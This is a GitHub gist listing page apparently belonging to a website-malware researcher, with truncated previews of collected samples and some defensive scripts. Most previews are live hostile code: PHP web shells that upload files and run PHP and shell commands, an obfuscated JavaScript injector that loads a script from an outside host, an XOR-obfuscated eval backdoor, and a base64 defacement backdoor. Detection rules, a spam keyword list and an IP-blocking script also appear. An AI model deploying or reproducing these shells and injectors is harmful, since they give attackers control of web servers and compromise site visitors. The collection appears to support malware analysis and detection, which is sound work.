Salvador Aguilar malwador
⚔️
malwador
/ SiteMaintenanceTemplate.html
Created
November 13, 2023 14:52
— forked from niksmac/SiteMaintenanceTemplate.html
Simple Maintenance Template Page - HTML CSS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <title>Site Maintenance</title> | |
| <meta charset="utf-8"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1"> | |
| <style> | |
| body { text-align: center; padding: 150px; } | |
| h1 { font-size: 50px; } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| goto IRGg0; IRGg0: ?> | |
| <style>body{background-color:#000;color:#fff}</style><form action=""enctype="multipart/form-data"id="uploader"method="post"name="uploader"><input name="file"type="file"size="50"><input name="_upl"id="_upl"type="submit"value="Upload"><br><br><label for="">PHP command</label><input name="phpcmd"id=""><input name="_upl"id="_upl"type="submit"value="run php command"><br><br><label for="">Shell command</label><input name="shellcmd"id=""><input name="_upl"id="_upl"type="submit"value="run shell command"></form><?php goto HCwez; z4H36: if ($_POST["\137\x75\160\154"] == "\162\x75\x6e\x20\x73\x68\x65\154\154\40\143\x6f\x6d\155\x61\156\144") { $tmpFile = tempnam(sys_get_temp_dir(), "\x64\171\156\141\x6d\x69\143"); $fileHandle = fopen($tmpFile, "\167"); $tmp = $_POST["\x73\150\145\154\154\143\155\144"]; $vari = "\74\77\x70\150\160\x20\145\x63\150\x6f\50\100\163\x68\145\154\x6c\137\145\x78\145\x63\50\x22" . $tmp . "\x22\x29\x29\73\x3f\76"; fwrite($fileHandle, $vari); fclose($fileHandle); ob_st |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Below is a list of the most common legal drugs that are used in the SEO Pharma SPAM hacks. | |
| ## The block of code might include also a link to a 3rd party and can include some CSS properties to hide the block of code off the page, or make it invisible. | |
| Abilify | |
| Accutane | |
| Acomplia | |
| Adderall |
malwador
/ gist:b233eb0c1da182b9b2d9de14de997d5d
Created
July 29, 2021 21:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if ( md5(getenv('HTTP_USER_AGENT')) != '69bc3b342502573e6d727f341674f010') | |
| header('Location: ' . 'http://' . $_SERVER['HTTP_HOST'] ); | |
| $color = "#df5"; | |
| $dflt_actn = 'FilesWin'; | |
| @define('SELF_PATH', __FILE__); | |
| @session_start(); | |
| @ini_set('max_execution_time',0); | |
| if( get_magic_quotes_gpc() ) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # script para bloquear IPs de china - salvador aguilar | |
| echo "Blocking 8444 Chinese IPs via IPTABLES" | |
| echo "======================= by Sal Aguilar" | |
| iptables -A INPUT -s 1.0.1.0/24 -j DROP | |
| iptables -A INPUT -s 1.0.2.0/23 -j DROP | |
| iptables -A INPUT -s 1.0.8.0/21 -j DROP | |
| iptables -A INPUT -s 1.0.32.0/19 -j DROP | |
| iptables -A INPUT -s 1.1.0.0/24 -j DROP | |
| iptables -A INPUT -s 1.1.2.0/23 -j DROP | |
| iptables -A INPUT -s 1.1.4.0/22 -j DROP |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,111,114,101,46,100,111,110,116,107,105,110,104,111,111,111,116,46,116,119,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php preg_replace("\234\x4d\x37\x9c\xf0\244\x2b\176"^"\xbf\145\31\xb7\331\207\x42\x1b","\xe\x92\xba\256\x5e\272\xf6\x47\x61\xfd\x19\320\x36\256\xc\311\xa9\x4f\302\344\xe\x6c\xb8\72\374\x39\56\x99\371\x30\xef\x1e\141\x69\74\156\270"^"\x6b\xe4\333\xc2\166\335\214\x2e\17\x9b\165\xb1\102\313\x24\xab\xc8\74\247\322\72\63\xdc\137\237\x56\112\xfc\321\x17\263\x2f\x46\x40\25\107\x83","\xe9\x2\xec\156\336\272\x84\270\30\362\231\x48\x70\367\x96\x9e\15\370\373\xe3\253\60\xaf\171\273\55\347\5\xef\xac\x4f\x8d\324\17\x1b\x29\xee\x18\x4f\x9f\x9d\26\x62\xee\343\135\xa1\x4\66\33\146\17\14\64\xba\x65\345\x62\xdf\153\x1d\xcb\x28\x8c\x5f\132\x70\243\xe6\252\14\5\221\x57\50\x62\313\xc\x84\xe8\x25\210\x5a\x8\132\xee\xf5\xc0\353\xa5\130\17\x33\315\x97\x29\215\x53\41\236\xbd\xea\x58\x76\x13\xb0\220\x81\x5\xbf\xa6\112\xbd\65\311\354\x12\xc5\31\x18\xd0\x77\164\206\174\xef\3\112\xa4\352\xe9\x0\270\131\xa\71\126\200\xb8\311\17\104\xc7\151\x7f\356\x4c\x9\201\xae\233\250\340\54\x75\350\xc4\367\1\1\xd1\71\x70\x26\x95\xfa\222\26\x72\241\x8\ |
malwador
/ gist:12925c42ace466b2f0098e8348558556
Created
December 3, 2020 20:34
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $001 = /[a-z0-9]{0,5}(.)?saleforyou\.org/ // saleforyou[.]org is reported to be used for a WP Login stealer. | |
| $002 = /[a-z0-9]{0,5}(.)?bingstyle\.com/ // same as above | |
| $003 = "www.24hod.sk" nocase | |
| $004 = /[a-z0-9]{4,64}\.designmysite\.pro/ //Phishing and malware distribution | |
| $005 = "times2day.com" nocase //redirector | |
| $006 = "lundybright.fr" nocase // https://labs.sucuri.net/face-mask-links-injected-into-wordpress-database/ | |
| $007 = "collectfasttracks.com" nocase | |
| $008 = "digestcolect.com" nocase | |
| $009 = "balantfromsun.com" nocase | |
| $010 = "trackstatisticsss.com" nocase |
malwador
/ firstbackdoor.php
Created
October 27, 2020 22:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $oIndex = 'PGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LUxhbmd1YWdlIiBjb250ZW50PSJhci1rdyI+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1MiI+Cjx0aXRsZT5oYWNrZWQgQnkgQ2hpbmFmYW5zPC90aXRsZT4KPHN0eWxlIHR5cGU9InRleHQvY3NzIj5pbWd7b3BhY2l0eTowLjU7LXdlYmtpdC10cmFuc2l0aW9uOmFsbCAyNTBtcyBlYXNlOy1tb3otdHJhbnNpdGlvbjphbGwgMjUwbXMgZWFzZTstby10cmFuc2l0aW9uOmFsbCAyNTBtcyBlYXNlO3RyYW5zaXRpb246YWxsIDI1MG1zIGVhc2U7fWltZzpob3ZlcntvcGFjaXR5OjE7fXRleHRhcmVhe3Jlc2l6ZTpub25lO308L3N0eWxlPgo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0iaGFja2VkIEJ5IENoaW5hZmFucyI+CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJoYWNrZWQgQnkgQ2hpbmFmYW5zIj4KPHN0eWxlPgpBOmxpbmsge3RleHQtZGVjb3JhdGlvbjogbm9uZTt9CkE6YWN0aXZlIHt0ZXh0LWRlY29yYXRpb246IG5vbmU7fQouYXV0by1zdHlsZTEgewoJY29sb3I6ICNGRjAwMDA7Cn0KLmF1dG8tc3R5bGUyIHsKCXRleHQtYWxpZ246IGNlbnRlcjsKfQouYXV0by1zdHlsZTMgewoJY29sb3I6ICMwMEZGM0M7Cn0KPC9zdHlsZT4KPC9oZWFkPgo8Ym9keSBiZ2NvbG9yPSIjMTQxNDE0Ij4KPGRpdiBhbGlnbj0iY2VudGVyIj4KCSAgICAgICAgPHA+Jm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Sitemaps: WP_Sitemaps_Posts class | |
| * | |
| * Builds the sitemaps for the 'post' object type. | |
| * | |
| * @package WordPress | |
| * @subpackage Sitemaps | |
| * @since 5.5.0 | |
| */ |
NewerOlder